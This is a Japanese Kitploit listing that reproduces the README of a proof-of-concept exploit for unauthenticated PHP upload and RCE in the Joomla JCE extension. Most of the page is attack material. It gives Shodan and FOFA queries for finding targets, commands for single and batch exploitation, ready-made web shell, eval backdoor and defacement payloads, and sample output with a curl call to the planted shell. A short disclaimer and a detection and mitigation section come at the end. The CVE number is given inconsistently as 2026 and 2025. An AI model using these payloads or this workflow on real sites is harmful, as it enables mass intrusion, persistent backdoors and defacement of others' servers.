Skip to content
KitploitKITPLOIT
ツールブログ
Log in
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

フィードお問い合わせプライバシー© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-48907 — CVE-2025-48907 - Joomla JCE 2.9.99.5未満向けの認証不要のRCEエクスプロイト | Kitploit
ツール/GitHubGitHub/0xgh057r3c0n/cve-2026-48907
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングペイロード開発
GitHub0xgh057r3c0n/cve-2026-48907

CVE-2026-48907

CVE-2025-48907 - Joomla JCE 2.9.99.5未満向けの認証不要のRCEエクスプロイト

リポジトリを見る
41623ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
Joomla ロゴ

CVE-2026-48907 - Joomla! JCE 認証なしリモートコード実行

Joomla! JCE 拡張機能 < 2.9.99.5 - 認証なし任意PHPファイルアップロードおよびリモートコード実行

License: MIT Python 3.6+ Security Shodan FOFA


🔎 検索エンジンクエリ

Shodan

http.component:"Joomla"

FOFA

app="Joomla"

📋 概要

このリポジトリには、CVE-2026-48907 の概念実証 (PoC) エクスプロイトが含まれています。これは、Joomla! JCE (Joomla Content Editor) 拡張機能のバージョン 2.9.99.5 未満 における重大な脆弱性です。この脆弱性により、認証されていない攻撃者 が JCE プロファイルインポート機能を介して任意の PHP ファイル をアップロードし、リモートコード実行 (RCE) を引き起こすことができます。

⚠️ 免責事項

このツールは教育および許可されたテスト目的のみに使用してください。

  • 自分が所有している、または明示的なテスト許可を得ているシステムでのみ使用してください
  • 作者は誤用や違法行為について一切の責任を負いません
  • テストを実施する前に必ず適切な許可を取得してください

🔍 脆弱性の詳細

プロパティ値
CVE IDCVE-2026-48907
製品Joomla! JCE 拡張機能
影響を受けるバージョン< 2.9.99.5
脆弱性の種類認証なし PHP ファイルアップロード → RCE
CVSS スコア9.8 (重大)
攻撃ベクトルネットワーク
認証不要
影響システム全体の侵害

動作の仕組み

  1. CSRF トークンの抽出: エクスプロイトはまず、ターゲットのホームページから CSRF トークンを抽出します
  2. プロファイルインポートの悪用: JCE プロファイルインポート機能 (index.php?option=com_jce&task=profiles.import) を利用します
  3. PHP ファイルのアップロード: プロファイル XML ファイルとして偽装した悪意のある PHP ファイルをアップロードします
  4. コードの実行: アップロードされた PHP ファイルは /tmp/ ディレクトリに配置され、直接アクセスすることで実行可能です

🚀 機能

  • ✅ 任意の PHP ファイルをアップロード: カスタム PHP シェル、バックドア、改ざんページ (PHP ベース) をアップロード可能
  • ✅ バッチ処理: ファイルから複数のターゲットをスキャンして悪用可能
  • ✅ CSRF トークンの自動検出: CSRF トークンを自動的に抽出
  • ✅ 詳細モード: デバッグ用の詳細な出力
  • ✅ 結果のエクスポート: 成功したアップロード URL をファイルに保存可能

📦 インストール

# リポジトリをクローン
git clone https://github.com/0xgh057r3c0n/CVE-2025-48907.git
cd CVE-2025-48907

# 必要な依存関係をインストール
pip3 install requests urllib3

必要条件

  • Python 3.6 以上
  • requests ライブラリ
  • urllib3 ライブラリ

🎯 使い方

基本構文

python3 CVE-2025-48907.py -u <ターゲットURL> -F <アップロードするPHPファイル>

例

PHP Web Shell をアップロード

python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php

PHP 改ざんページをアップロード

python3 CVE-2025-48907.py -u http://target-joomla.com -F deface.php

PHP バックドアをアップロード

python3 CVE-2025-48907.py -u http://target-joomla.com -F backdoor.php

ターゲットファイルを使用したバッチ悪用

python3 CVE-2025-48907.py -f targets.txt -F payload.php

詳細出力と結果保存

python3 CVE-2025-48907.py -u http://target-joomla.com -F shell.php -v -o results.txt

コマンドライン引数

引数必須説明
-u, --urlはい*単一ターゲットURL (例: http://target.com)
-f, --fileはい*ターゲットURLのリストを含むファイル (1行に1URL)
-F, --upload-fileはいアップロードするPHPファイル (シェル、バックドア、改ざんページ)
-v, --verboseいいえデバッグ用の詳細出力を有効にする
-o, --outputいいえ成功したアップロードURLをファイルに保存する

* -u または -f のいずれかを指定する必要があります

ターゲットファイルの形式

targets.txt ファイルを作成し、各行に 1 つの URL を記述します:

http://joomla-site1.com
https://joomla-site2.com
http://192.168.1.100/joomla
# コメントは無視されます
https://example-joomla.com

🔧 PHP ペイロードの作成

すべてのペイロードは PHP ファイル である必要があります。エクスプロイトはサーバー上で実行される PHP コードをアップロードするためです。

PHP Web Shell

shell.php を作成:

<?php
// Simple PHP Web Shell
if(isset($_GET['cmd'])){
    echo "<pre>";
    system($_GET['cmd']);
    echo "</pre>";
} else {
    echo "Usage: ?cmd=command";
}
?>

PHP 改ざんページ

deface.php を作成:

<?php
// PHP Deface Page
echo '<!DOCTYPE html>
<html>
<head>
    <title>Hacked by 0xgh057r3c0n</title>
    <style>
        body {
            background: #000;
            color: #0f0;
            font-family: "Courier New", monospace;
            text-align: center;
            padding: 50px;
        }
        h1 { font-size: 4em; text-shadow: 0 0 20px #0f0; }
        .ascii-art { white-space: pre; font-size: 12px; }
    </style>
</head>
<body>
    <h1>HACKED BY 0xgh057r3c0n</h1>
    <div class="ascii-art">
    ██╗  ██╗ █████╗  ██████╗██╗  ██╗███████╗██████╗ 
    ██║  ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗
    ███████║███████║██║     █████╔╝ █████╗  ██║  ██║
    ██╔══██║██╔══██║██║     ██╔═██╗ ██╔══╝  ██║  ██║
    ██║  ██║██║  ██║╚██████╗██║  ██╗███████╗██████╔╝
    ╚═╝  ╚═╝╚═╝  ╚═╝ ╚═════╝╚═╝  ╚═╝╚══════╝╚═════╝ 
    </div>
    <p>Security is not a product, it\'s a process.</p>
    <p>Server: <?php echo $_SERVER["SERVER_SOFTWARE"]; ?></p>
    <p>Time: <?php echo date("Y-m-d H:i:s"); ?></p>
</body>
</html>';
?>

PHP バックドア (最小限)

backdoor.php を作成:

<?php
// Minimal PHP Backdoor
if(isset($_REQUEST['c'])) { eval($_REQUEST['c']); }
?>

📊 出力例

_____________   _______________         _______________   ________  ________            _____   ______  ________________________ 
\_   ___ \   \ /   /\_   _____/         \_____  \   _  \  \_____  \/  _____/           /  |  | /  __  \/   __   \   _  \______  \
/    \  \/\   Y   /  |    __)_   ______  /  ____/  /_\  \  /  ____/   __  \   ______  /   |  |_>      <\____    /  /_\  \  /    /
\     \____\     /   |        \ /_____/ /       \  \_/   \/       \  |__\  \ /_____/ /    ^   /   --   \  /    /\  \_/   \/    / 
 \______  / \___/   /_______  /         \_______ \_____  /\_______ \_____  /         \____   |\______  / /____/  \_____  /____/  
        \/                  \/                  \/     \/         \/     \/               |__|       \/                \/

Joomla! JCE extension < 2.9.99.5 Unauthenticated RCE
Author : 0xgh057r3c0n (PHP File Upload)

[*] Loaded 3 target(s)

[*] Target 1/3
[*] ==================================================
[+] Target: http://target-joomla.com
[+] Fetching CSRF token...
[+] CSRF Token: a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6
[+] Uploading PHP file: cve-2026-48907-1234.xml.php
[+] Profile imported successfully!
[+] Testing uploaded PHP file...

============================================================
[!!!!!] PHP FILE UPLOADED SUCCESSFULLY!
[!!!!!] Server IS VULNERABLE to CVE-2025-48907!
============================================================

[+] View your uploaded PHP file: http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php
[+] Quick access:
    curl "http://target-joomla.com/tmp/cve-2026-48907-1234.xml.php?cmd=id"

🛡️ 検出と緩和策

検出方法

  • /tmp/ ディレクトリ内の不審な PHP ファイルを確認する
  • ログで JCE プロファイルインポートのアクティビティを監視する
  • index.php?option=com_jce&task=profiles.import への予期しないリクエストを確認する
  • /tmp/ 内の .xml.php 拡張子のファイルを確認する
  • /tmp/ ディレクトリからの異常な PHP 実行を監視する

緩和手順

  1. JCE 拡張機能の更新:

    • バージョン 2.9.99.5 以上にアップグレードする
    • ダウンロード元: JCE 公式サイト
  2. 一時的な回避策:

    • 不要な場合は JCE 拡張機能を無効にする
    • Web アプリケーションファイアウォール (WAF) ルールを実装する
    • /tmp/ ディレクトリでの PHP 実行を制限する
    • 不要な場合は allow_url_fopen を無効にする
  3. 侵害後の措置:

    • /tmp/ からアップロードされた PHP ファイルを削除する
    • バックドアがないかシステムを監査する
    • すべての認証情報をリセットする (Joomla 管理者、FTP、ホスティング)
    • システムログを確認し、不正アクセスを特定する
    • 他の侵害されたファイルがないか確認する

📝 ライセンス

このプロジェクトは MIT ライセンス の下で提供されています。詳細は LICENSE ファイルを参照してください。

License: MIT


🤝 貢献

貢献を歓迎します!プルリクエストをぜひ送信してください。

ツールをダウンロード